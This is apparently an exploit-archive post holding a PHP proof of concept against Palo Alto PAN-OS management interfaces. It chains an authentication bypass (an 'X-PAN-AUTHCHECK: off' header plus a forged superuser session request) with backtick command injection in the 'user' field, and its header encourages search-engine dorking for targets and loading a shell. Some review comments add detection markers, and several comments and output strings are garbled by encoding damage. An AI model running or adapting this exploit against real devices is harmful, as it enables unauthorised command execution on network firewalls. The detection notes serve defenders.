Palo Alto Networks PAN-OS 11.2 PHP Code Injection
=============================================================================================================================================
| # Title Palo Alto Networks PAN-OS 11.2 PHP Code Injection
=============================================================================================================================================
| # Title : Palo Alto Networks PAN-OS 11.2 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://paloaltonetworks.com |
=============================================================================================================================================
POC :
[+] Dorking in Google or another search engine.
[+] Bypasses authentication using CVE-2024-0012.
Exploits command execution vulnerability CVE-2024-9474.
Uses an administrator session to run any commands on the system.
Supports execution of any command on the system, such as loading a shell.
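( https://packetstorm.news/files/id/182665/ - CVE-2024-24809, CVE-2024-5910 ) (note: the CVE IDs listed with this reference differ from CVE-2024-0012 and CVE-2024-9474 named above; check the vendor advisories to confirm which identifiers apply before tracking or patching against them)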
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] SeT target = Line : 77
[+] PayLoad :
<?php
/**
 * Thin cURL wrapper: performs one HTTP request and hands back whatever curl_exec() returns.
 *
 * The handle is configured to return the transfer as a value, to follow redirects,
 * and with CURLOPT_SSL_VERIFYPEER disabled, so the peer certificate is not verified.
 * $data is attached only when $method compares equal to 'POST'.
 *
 * @param string $url     Request URL.
 * @param mixed  $data    Value passed to CURLOPT_POSTFIELDS for POST requests.
 * @param array  $headers Header lines passed to CURLOPT_HTTPHEADER when non-empty.
 * @param string $method  'POST' enables the POST options; any other value leaves cURL's default.
 * @param array  $cookies "name=value" strings, joined with "; " into CURLOPT_COOKIE when non-empty.
 * @return mixed The curl_exec() result (false on failure).
 */
function sendRequest($url, $data = null, $headers = [], $method = 'GET', $cookies = []) {
    $handle = curl_init();

    // Fixed options, applied in the same order as before.
    $fixedOptions = [
        [CURLOPT_URL, $url],
        [CURLOPT_RETURNTRANSFER, true],
        [CURLOPT_SSL_VERIFYPEER, false], // certificate verification is switched off
        [CURLOPT_FOLLOWLOCATION, true],
    ];
    foreach ($fixedOptions as $pair) {
        curl_setopt($handle, $pair[0], $pair[1]);
    }

    if ($headers) {
        curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
    }

    if ($cookies) {
        $cookieLine = implode("; ", $cookies);
        curl_setopt($handle, CURLOPT_COOKIE, $cookieLine);
    }

    $isPost = ($method == 'POST');
    if ($isPost) {
        curl_setopt($handle, CURLOPT_POST, true);
        curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
    }

    $body = curl_exec($handle);
    curl_close($handle);

    return $body;
}
// Step 1: obtain a session ID via createRemoteAppwebSession.php (original comment unreadable: character-encoding damage)
/**
 * Requests a web session from the target and returns the PHPSESSID found in the reply.
 *
 * Builds a URL under /php/utils/createRemoteAppwebSession.php whose query string is
 * eight random hex characters followed by ".js.map", then POSTs the form fields below
 * together with the header "X-PAN-AUTHCHECK: off". The accompanying page text
 * attributes this step to CVE-2024-0012 (authentication bypass).
 *
 * NOTE(review): from a detection standpoint the request is recognisable by three
 * things visible here: the "X-PAN-AUTHCHECK: off" request header, the
 * createRemoteAppwebSession.php path with a ".js.map" suffix, and backtick characters
 * in the "user" field. Presumably these show up in the management interface's web
 * server logs; confirm against your own logging before relying on it.
 *
 * @param string $target Base URL; concatenated unmodified in front of the path.
 * @return string|null The text captured after "PHPSESSID=" up to the next ";", or
 *                     null when that marker is absent from what sendRequest() returned.
 */
function bypassAuth($target) {
// Random 4-byte value rendered as hex makes each request URL unique.
$auth_url = "$target/php/utils/createRemoteAppwebSession.php?" . bin2hex(random_bytes(4)) . ".js.map";
$postData = [
'user' => '`whoami`', // backtick-wrapped value; the original (encoding-damaged) note also mentions `cmd.exe /c whoami`
'userRole' => 'superuser',
'remoteHost' => '',
'vsys' => 'vsys1'
];
$headers = [
"X-PAN-AUTHCHECK: off"
];
// Fields are URL-encoded into a single string before being sent as the POST body.
$response = sendRequest($auth_url, http_build_query($postData), $headers, 'POST');
// Only the text returned by sendRequest() is searched for the session marker.
if (strpos($response, "PHPSESSID") !== false) {
preg_match('/PHPSESSID=([^;]+)/', $response, $matches);
// Falls back to null if the pattern did not capture a value.
return $matches[1] ?? null;
}
return null;
}
// Step 2: send the command string using the session cookie (original comment unreadable: character-encoding damage)
/**
 * Sends $cmd, wrapped in backticks, as the "user" field to $target/index.php/.js.map
 * with the given session ID as a PHPSESSID cookie.
 *
 * The accompanying page text attributes this step to CVE-2024-9474. The value
 * returned by sendRequest() is discarded, so this function neither returns nor
 * prints anything.
 *
 * NOTE(review): the markers a defender can look for are the same as in the first
 * step: backticks inside a "user" form field alongside userRole=superuser, and a
 * request path ending in "/.js.map". Presumably visible in web server logs on the
 * management interface; confirm against your own telemetry.
 *
 * @param string $target  Base URL; concatenated unmodified in front of the path.
 * @param string $session Session ID placed in the PHPSESSID cookie.
 * @param string $cmd     Command text placed between backticks in the "user" field.
 * @return void
 */
function executeCommand($target, $session, $cmd) {
$exploit_url = "$target/index.php/.js.map";
$cookies = ["PHPSESSID=$session"];
// PHP_OS names the operating system PHP itself is running on.
if (stripos(PHP_OS, 'WIN') !== false) {
$cmd = "cmd.exe /c " . $cmd; // prefix applied when PHP_OS contains "WIN" (case-insensitive)
}
$postData = [
'user' => "`$cmd`",
'userRole' => 'superuser',
'remoteHost' => '',
'vsys' => 'vsys1'
];
// The field array, no extra headers, method 'GET' and the cookie list go to sendRequest(); its result is not used.
sendRequest($exploit_url, $postData, [], 'GET', $cookies);
}
// Script entry: runs the session step, then the command step, printing progress lines.
// The echoed strings below are encoding-damaged in this copy and are kept verbatim as runtime output.
$target = "http://127.0.0.1"; // base URL of the system under test; this copy points at loopback
echo "[+] ????? ????????...\n";
$session = bypassAuth($target);
// bypassAuth() returns null when no PHPSESSID was found, which takes the else branch.
if ($session) {
echo "[+] ?? ?????? ??? ??????: $session\n";
// Both branches call executeCommand() with identical arguments; only the printed label differs.
if (stripos(PHP_OS, 'WIN') !== false) {
echo "[+] ????? ??? Windows: whoami\n";
executeCommand($target, $session, "whoami");
} else {
echo "[+] ????? ??? Linux: whoami\n";
executeCommand($target, $session, "whoami");
}
} else {
echo "[-] ??? ????? ????????!\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================